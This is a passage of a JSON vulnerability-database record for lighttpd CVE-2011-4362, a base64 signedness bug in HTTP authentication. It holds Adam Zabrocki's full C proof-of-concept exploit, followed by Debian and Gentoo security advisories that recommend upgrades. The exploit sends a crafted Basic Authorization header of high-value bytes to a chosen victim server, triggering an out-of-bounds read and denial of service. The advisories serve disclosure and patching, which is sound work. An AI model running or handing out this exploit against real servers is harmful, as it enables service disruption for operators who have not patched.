45 | 33)\r\n * -83(d | 46 | 34)\r\n * -82(( | 47 | 35)\r\n * -81(n | 48 | 36)\r\n * -80(y | 49 | 36)\r\n * -79(h | 50 | 37)\r\n * -78(d | 51 | 38)\r\n * -77(g | 52 | 39)\r\n * -76(s | 53 | 39)\r\n * -75( | 54 | 40)\r\n * -74(r | 55 | 41)\r\n * -73(p | 56 | 42)\r\n * -72(a | 57 | 42)\r\n * -71(n | 58 | 43)\r\n * -70(. | 59 | 44)\r\n * -69(. | 60 | 45)\r\n * -68(d | 61 | 45)\r\n * -67(g | 62 | 46)\r\n * -66(s | 63 | 47)\r\n * -65(: | 64 | 48)\r\n * -64(( | 65 | 48)\r\n * -63(d | 66 | 49)\r\n * -62(- | 67 | 50)\r\n * -61(e | 68 | 51)\r\n * -60(s | 69 | 51)\r\n * -59( | 70 | 52)\r\n * -58(i | 71 | 53)\r\n * -57(s | 72 | 54)\r\n * -56(n | 73 | 54)\r\n * -55( | 74 | 55)\r\n * -54(i | 75 | 56)\r\n * -53(l | 76 | 57)\r\n * -52(. | 77 | 57)\r\n * -51(. | 78 | 58)\r\n * -50(k | 79 | 59)\r\n * -49(0 | 80 | 60)\r\n * -48(% | 81 | 60)\r\n * -47(] | 82 | 61)\r\n * -46(p | 83 | 62)\r\n * -45(r | 84 | 63)\r\n * -44(0 | 85 | 63)\r\n * -43(% | 86 | 64)\r\n * -42(] | 87 | 65)\r\n * -41(s | 88 | 66)\r\n * -40(z | 89 | 66)\r\n * -39([ | 90 | 67)\r\n * -38(x | 91 | 68)\r\n * -37(x | 92 | 69)\r\n * -36( | 93 | 69)\r\n * -35(s | 94 | 70)\r\n * -34(d | 95 | 71)\r\n * -33(0 | 96 | 72)\r\n * -32(% | 97 | 72)\r\n * -31(] | 98 | 73)\r\n * -30(. | 99 | 74)\r\n * -29(. | 100 | 75)\r\n * -28(d | 101 | 75)\r\n * -27(c | 102 | 76)\r\n * -26(d | 103 | 77)\r\n * -25(i | 104 | 78)\r\n * -24(g | 105 | 78)\r\n * -23(b | 106 | 79)\r\n * -22(s | 107 | 80)\r\n * -21(6 | 108 | 81)\r\n * -20(- | 109 | 81)\r\n * -19(t | 110 | 82)\r\n * -18(i | 111 | 83)\r\n * -17(g | 112 | 84)\r\n * -16(f | 113 | 84)\r\n * -15(i | 114 | 85)\r\n * -14(e | 115 | 86)\r\n * -13(. | 116 | 87)\r\n * -12(. | 117 | 87)\r\n * -11(. | 118 | 88)\r\n * -10(. | 119 | 89)\r\n * -9(. | 120 | 90)\r\n * -8(. | 121 | 90)\r\n * -7(. | 122 | 91)\r\n * -6(. | 123 | 92)\r\n * -5(. | 124 | 93)\r\n * -4(. | 125 | 93)\r\n * -3(. | 126 | 94)\r\n * -2(. | 127 | 95)\r\n * -1(. | 128 | 96)\r\n * k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * ptr[0x9a92c48] size[0xc0] used[0x60]\r\n * string [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n * --- CUT ---\r\n *\r\n * First column is the offset so vulnerability is executed like it should be\r\n * (negative offsets). Second column is byte which is read out-of-bound.\r\n *\r\n *\r\n * Maybe you can find vulnerable binary?\r\n *\r\n *\r\n * Best regards,\r\n * Adam 'pi3' Zabrocki\r\n *\r\n *\r\n * --\r\n * http://pi3.com.pl\r\n * http://site.pi3.com.pl/exp/p_cve-2011-4362.c\r\n * http://blog.pi3.com.pl/?p=277\r\n *\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <getopt.h>\r\n\r\n#define PORT 80\r\n#define SA struct sockaddr\r\n\r\nchar header[] =\r\n\"GET /%s/ HTTP/1.1\\r\\n\"\r\n\"Host: %s\\r\\n\"\r\n\"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n\"\r\n\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\n\"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n\"\r\n\"Accept-Encoding: gzip, deflate\\r\\n\"\r\n\"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"\r\n\"Proxy-Connection: keep-alive\\r\\n\"\r\n\"Authorization: Basic \";\r\n\r\nchar header_port[] =\r\n\"GET /%s/ HTTP/1.1\\r\\n\"\r\n\"Host: %s:%d\\r\\n\"\r\n\"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n\"\r\n\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\n\"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n\"\r\n\"Accept-Encoding: gzip, deflate\\r\\n\"\r\n\"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"\r\n\"Proxy-Connection: keep-alive\\r\\n\"\r\n\"Authorization: Basic \";\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n\r\n int i=PORT,opt=0,sockfd;\r\n char *remote_dir = NULL;\r\n char *r_hostname = NULL;\r\n struct sockaddr_in servaddr;\r\n struct hostent *h = NULL;\r\n char *buf;\r\n unsigned int len = 0x0;\r\n\r\n\r\n if (!argv[1])\r\n usage(argv[0]);\r\n\r\n\r\n printf(\"\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n\");\r\n printf(\"\\n\\t\\t[+] Preparing arguments... \");\r\n while((opt = getopt(argc,argv,\"h:d:p:?\")) != -1) {\r\n switch(opt) {\r\n\r\n case 'h':\r\n\r\n r_hostname = strdup(optarg);\r\n if ( (h = gethostbyname(r_hostname))==NULL) {\r\n printf(\"Gethostbyname() field!\\n\");\r\n exit(-1);\r\n }\r\n break;\r\n\r\n case 'p':\r\n\r\n i=atoi(optarg);\r\n break;\r\n\r\n case 'd':\r\n\r\n remote_dir = strdup(optarg);\r\n break;\r\n\r\n case '?':\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n default:\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n }\r\n }\r\n\r\n if (!remote_dir || !h) {\r\n usage(argv[0]);\r\n exit(-1);\r\n }\r\n\r\n servaddr.sin_family = AF_INET;\r\n servaddr.sin_port = htons(i);\r\n servaddr.sin_addr = *(struct in_addr*)h->h_addr;\r\n\r\n len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512;\r\n if ( (buf = (char *)malloc(len)) == NULL) {\r\n printf(\"malloc() :(\\n\");\r\n exit(-1);\r\n }\r\n memset(buf,0x0,len);\r\n\r\n if (i != 80)\r\n snprintf(buf,len,header_port,remote_dir,r_hostname,i);\r\n else\r\n snprintf(buf,len,header,remote_dir,r_hostname);\r\n\r\n for (i=0;i<130;i++)\r\n buf[strlen(buf)] = 127+i;\r\n\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n\r\n printf(\"OK\\n\\t\\t[+] Creating socket... \");\r\n if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) {\r\n printf(\"Socket() error!\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"OK\\n\\t\\t[+] Connecting to [%s]... \",r_hostname);\r\n if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) {\r\n printf(\"Connect() error!\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"OK\\n\\t\\t[+] Sending dirty packet... \");\r\n// write(1,buf,strlen(buf));\r\n write(sockfd,buf,strlen(buf));\r\n\r\n printf(\"OK\\n\\n\\t\\t[+] Check the website!\\n\\n\");\r\n\r\n close(sockfd);\r\n\r\n}\r\n\r\nint usage(char *arg) {\r\n\r\n printf(\"\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n\");\r\n printf(\"\\n\\tUsage: %s <options>\\n\\n\\t\\tOptions:\\n\",arg);\r\n printf(\"\\t\\t\\t -v <victim>\\n\\t\\t\\t -p <port>\\n\\t\\t\\t -d <remote_dir_for_auth>\\n\\n\");\r\n exit(0);\r\n}\r\n\r\n\r\n\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/17319"}], "debian": [{"lastseen": "2020-11-11T13:22:12", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "description": "- ---------------------------------------------------------------------------\nDebian Security Advisory DSA-2368-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nDec 20th, 2011 http://www.debian.org/security/faq\n- ---------------------------------------------------------------------------\n\nPackage : lighttpd\nVulnerability : multiple\nProblem type : remote\nDebian-specific: no\nDebian bug : 652726\nCVE IDs : CVE-2011-4362 CVE-2011-3389\n\nSeveral vulnerabilities have been discovered in lighttpd, a small and fast\nwebserver with minimal memory footprint.\n\nCVE-2011-4362\n\n Xi Wang discovered that the base64 decoding routine which is used to\n decode user input during an HTTP authentication, suffers of a signedness\n issue when processing user input. As a result it is possible to force\n lighttpd to perform an out-of-bounds read which results in Denial of\n Service conditions.\n\nCVE-2011-3389\n\n When using CBC ciphers on an SSL enabled virtual host to communicate with\n certain client, a so called "BEAST" attack allows man-in-the-middle\n attackers to obtain plaintext HTTP traffic via a blockwise\n chosen-boundary attack (BCBA) on an HTTPS session. Technically this is\n no lighttpd vulnerability. However, lighttpd offers a workaround to\n mitigate this problem by providing a possibility to disable CBC ciphers.\n\n This updates includes this option by default. System administrators\n are advised to read the NEWS file of this update (as this may break older\n clients).\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.30-1.\n\n\nWe recommend that you upgrade your lighttpd packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n", "edition": 3, "modified": "2011-12-21T00:21:08", "published": "2011-12-21T00:21:08", "id": "DEBIAN:DSA-2381-:320B8", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00246.html", "title": "[SECURITY] [DSA 2381-] lighttpd security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-11-11T13:12:46", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "description": "- ---------------------------------------------------------------------------\nDebian Security Advisory DSA-2368-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nDec 20th, 2011 http://www.debian.org/security/faq\n- ---------------------------------------------------------------------------\n\nPackage : lighttpd\nVulnerability : multiple\nProblem type : remote\nDebian-specific: no\nDebian bug : 652726\nCVE IDs : CVE-2011-4362 CVE-2011-3389\n\nSeveral vulnerabilities have been discovered in lighttpd, a small and fast\nwebserver with minimal memory footprint.\n\nCVE-2011-4362\n\n Xi Wang discovered that the base64 decoding routine which is used to\n decode user input during an HTTP authentication, suffers of a signedness\n issue when processing user input. As a result it is possible to force\n lighttpd to perform an out-of-bounds read which results in Denial of\n Service conditions.\n\nCVE-2011-3389\n\n When using CBC ciphers on an SSL enabled virtual host to communicate with\n certain client, a so called "BEAST" attack allows man-in-the-middle\n attackers to obtain plaintext HTTP traffic via a blockwise\n chosen-boundary attack (BCBA) on an HTTPS session. Technically this is\n no lighttpd vulnerability. However, lighttpd offers a workaround to\n mitigate this problem by providing a possibility to disable CBC ciphers.\n\n This updates includes this option by default. System administrators\n are advised to read the NEWS file of this update (as this may break older\n clients).\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.30-1.\n\n\nWe recommend that you upgrade your lighttpd packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n", "edition": 7, "modified": "2011-12-21T00:42:08", "published": "2011-12-21T00:42:08", "id": "DEBIAN:DSA-2368-1:91542", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00247.html", "title": "[SECURITY] [DSA 2368-1] lighttpd security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:42", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "edition": 1, "description": "### Background\n\nlighttpd is a lightweight high-performance web server.\n\n### Description\n\nMultiple vulnerabilities have been discovered in lighttpd. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could create a Denial of Service condition. Futhermore, a remote attacker may be able to execute arbitrary SQL statements. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll lighttpd users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/lighttpd-1.4.35\"", "modified": "2014-06-13T00:00:00", "published": "2014-06-13T00:00:00", "id": "GLSA-201406-10", "href": "https://security.gentoo.org/glsa/201406-10", "type": "gentoo", "title": "lighttpd: Multiple vulnerabilities", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}